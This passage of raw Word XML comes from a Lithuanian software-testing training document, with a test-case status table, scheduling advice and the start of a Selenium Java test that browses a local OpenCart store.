                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>TC5 (prio 2)</w:t>
            </w:r>
            <w:bookmarkEnd w:id="412"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1643"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13" w:name="_Toc14392605"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>x</w:t>
            </w:r>
            <w:bookmarkEnd w:id="413"/>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642"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r>
    </w:tbl>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Pateiktiems reikalavimams ištestuoti galima pasiruošti dieną prieš testavimo pradžią. T.y. iš viso, duoto laiko pakanka viskam ištestuoti. Reikia sukurti kelias paskyras ir </w:t>
      </w:r>
      <w:r w:rsidR="008407D0" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>atitinkamai suplanuoti laiką, ką</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> ir su kokia </w:t>
      </w:r>
      <w:r w:rsidR="008407D0" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>paskyra</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008407D0" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">reikia </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>atlikti atitinkamus veiksmus.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>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406"/>
        <w:gridCol w:w="1407"/>
        <w:gridCol w:w="1407"/>
        <w:gridCol w:w="1407"/>
        <w:gridCol w:w="1407"/>
        <w:gridCol w:w="1293"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidTr="00E350EA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="152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14" w:name="_Toc14392606"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>STATUS</w:t>
            </w:r>
            <w:bookmarkEnd w:id="414"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="140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en-US"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="415" w:name="_Toc14392607"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>TC1</w:t>
            </w:r>
            <w:bookmarkEnd w:id="415"/>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16" w:name="_Toc14392608"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>TC2</w:t>
            </w:r>
            <w:bookmarkEnd w:id="416"/>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17" w:name="_Toc14392609"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>TC3</w:t>
            </w:r>
            <w:bookmarkEnd w:id="417"/>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18" w:name="_Toc14392610"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>TC4</w:t>
            </w:r>
            <w:bookmarkEnd w:id="418"/>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19" w:name="_Toc14392611"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>TC5</w:t>
            </w:r>
            <w:bookmarkEnd w:id="419"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="129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sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="420" w:name="_Toc14392612"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>TOTAL</w:t>
            </w:r>
            <w:bookmarkEnd w:id="420"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidTr="00E350EA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="152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1" w:name="_Toc14392613"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>NOT RUN</w:t>
            </w:r>
            <w:bookmarkEnd w:id="421"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1406"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29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2" w:name="_Toc14392614"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:bookmarkEnd w:id="422"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidTr="00E350EA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="152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3" w:name="_Toc14392615"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>IN PROGRESS</w:t>
            </w:r>
            <w:bookmarkEnd w:id="423"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1406"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4" w:name="_Toc14392616"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>x</w:t>
            </w:r>
            <w:bookmarkEnd w:id="424"/>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5" w:name="_Toc14392617"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>x</w:t>
            </w:r>
            <w:bookmarkEnd w:id="425"/>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29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6" w:name="_Toc14392618"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:bookmarkEnd w:id="426"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidTr="00E350EA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="152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7" w:name="_Toc14392619"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>PASSED</w:t>
            </w:r>
            <w:bookmarkEnd w:id="427"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1406"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8" w:name="_Toc14392620"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>x</w:t>
            </w:r>
            <w:bookmarkEnd w:id="428"/>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29" w:name="_Toc14392621"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>x</w:t>
            </w:r>
            <w:bookmarkEnd w:id="429"/>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30" w:name="_Toc14392622"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>x</w:t>
            </w:r>
            <w:bookmarkEnd w:id="430"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="129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31" w:name="_Toc14392623"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:bookmarkEnd w:id="431"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidTr="00E350EA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1527"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32" w:name="_Toc14392624"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>FAILED</w:t>
            </w:r>
            <w:bookmarkEnd w:id="432"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1406"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407" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1293" w:type="dxa"/>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pStyle w:val="Heading1"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="433" w:name="_Toc14392625"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:bookmarkEnd w:id="433"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Pirmą testavimo dieną rekomenduotina pradėti testus TC</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>3, TC4;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Antrą testavimo dieną galime vykdyti TC</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>5, nors rekomenduotina būtų jį pradėti anksčiau.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>TC1, TC2 nereikalauja testinių duomenų „brandinimo“, juos galima vykdyti bet kuria testavimui skirta diena, tačiau, atsižvelgus į prioritetus, šiuos testavimo atvejus rekomenduotina vykdyti kuo anksčiau. Šiuo atveju – pirmą testavimo dieną.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:widowControl w:val="0"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00344469" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:right="282"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00017DE1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CF751A" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Kompetencija. Kurti ir vykdyti nesudėtingus automatinius testus</w:t>
      </w:r>
      <w:r w:rsidR="00EE5938">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A63EF8" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">2.1.  </w:t>
      </w:r>
      <w:r w:rsidR="00883D39" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Mokymosi rezultatas. Diegti ir valdyti automatinio testavimo</w:t>
      </w:r>
      <w:r w:rsidR="009C4310" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> įrankius</w:t>
      </w:r>
      <w:r w:rsidR="00EE5938">
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="993"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00883D39" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00391A4A" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">užduotis. </w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> ĮVADAS Į AUTOMATINĮ TESTAVIMĄ</w:t>
      </w:r>
      <w:r w:rsidR="007F235C">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE5938" w:rsidRPr="00AD4464" w:rsidRDefault="00EE5938"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434" w:name="_Toc14392626"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>public class IPhoneTest {</w:t>
            </w:r>
            <w:bookmarkEnd w:id="43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35" w:name="_Toc14392627"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>private WebDriver driver;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="43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36" w:name="_Toc14392628"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>private Map&lt;String, Object&gt; vars;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="43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37" w:name="_Toc14392629"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>JavascriptExecutor js;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="43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38" w:name="_Toc14392630"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>@Before</w:t>
            </w:r>
            <w:bookmarkEnd w:id="43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39" w:name="_Toc14392631"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>public void setUp() {</w:t>
            </w:r>
            <w:bookmarkEnd w:id="43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0" w:name="_Toc14392632"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>driver = new FirefoxDriver();</w:t>
            </w:r>
            <w:bookmarkEnd w:id="44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1" w:name="_Toc14392633"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>js = (JavascriptExecutor) driver;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="44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2" w:name="_Toc14392634"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>vars = new HashMap&lt;String, Object&gt;();</w:t>
            </w:r>
            <w:bookmarkEnd w:id="44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3" w:name="_Toc14392635"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="44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4" w:name="_Toc14392636"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>@After</w:t>
            </w:r>
            <w:bookmarkEnd w:id="44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5" w:name="_Toc14392637"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>public void tearDown() {</w:t>
            </w:r>
            <w:bookmarkEnd w:id="44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6" w:name="_Toc14392638"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>driver.quit();</w:t>
            </w:r>
            <w:bookmarkEnd w:id="44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7" w:name="_Toc14392639"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="44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8" w:name="_Toc14392640"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>@Test</w:t>
            </w:r>
            <w:bookmarkEnd w:id="44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49" w:name="_Toc14392641"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>public void iPhoneTest() {</w:t>
            </w:r>
            <w:bookmarkEnd w:id="44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0" w:name="_Toc14392642"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>driver.get("http://localhost/opencart/upload/");</w:t>
            </w:r>
            <w:bookmarkEnd w:id="45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1" w:name="_Toc14392643"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>driver.manage().window().setSize(new Dimension(1920, 1057));</w:t>
            </w:r>
            <w:bookmarkEnd w:id="45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2" w:name="_Toc14392644"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>driver.findElement(By.linkText("Phones &amp; PDAs")).click();</w:t>
            </w:r>
            <w:bookmarkEnd w:id="45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3" w:name="_Toc14392645"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>driver.findElement(By.linkText("iPhone")).click();</w:t>
            </w:r>
            <w:bookmarkEnd w:id="45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4" w:name="_Toc14392646"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>{</w:t>
            </w:r>
            <w:bookmarkEnd w:id="45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5" w:name="_Toc14392647"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>WebElement element = driver.findElement(By.cssSelector(".text-center &gt; a"));</w:t>
            </w:r>
            <w:bookmarkEnd w:id="45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6" w:name="_Toc14392648"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Action builder = new Actions(driver);</w:t>
            </w:r>
            <w:bookmarkEnd w:id="45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7" w:name="_Toc14392649"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>builder.moveToElement(element).perform();</w:t>
            </w:r>
            <w:bookmarkEnd w:id="45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8" w:name="_Toc14392650"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="45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59" w:name="_Toc14392651"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>{</w:t>
            </w:r>
            <w:bookmarkEnd w:id="45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0" w:name="_Toc14392652"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>WebElement element = driver.findElement(By.tagName("body"));</w:t>
            </w:r>
            <w:bookmarkEnd w:id="46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1" w:name="_Toc14392653"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Action builder = new Actions(driver);</w:t>
            </w:r>
            <w:bookmarkEnd w:id="46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2" w:name="_Toc14392654"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>builder.moveToElement(element, 0, 0).perform();</w:t>
            </w:r>
            <w:bookmarkEnd w:id="46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3" w:name="_Toc14392655"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
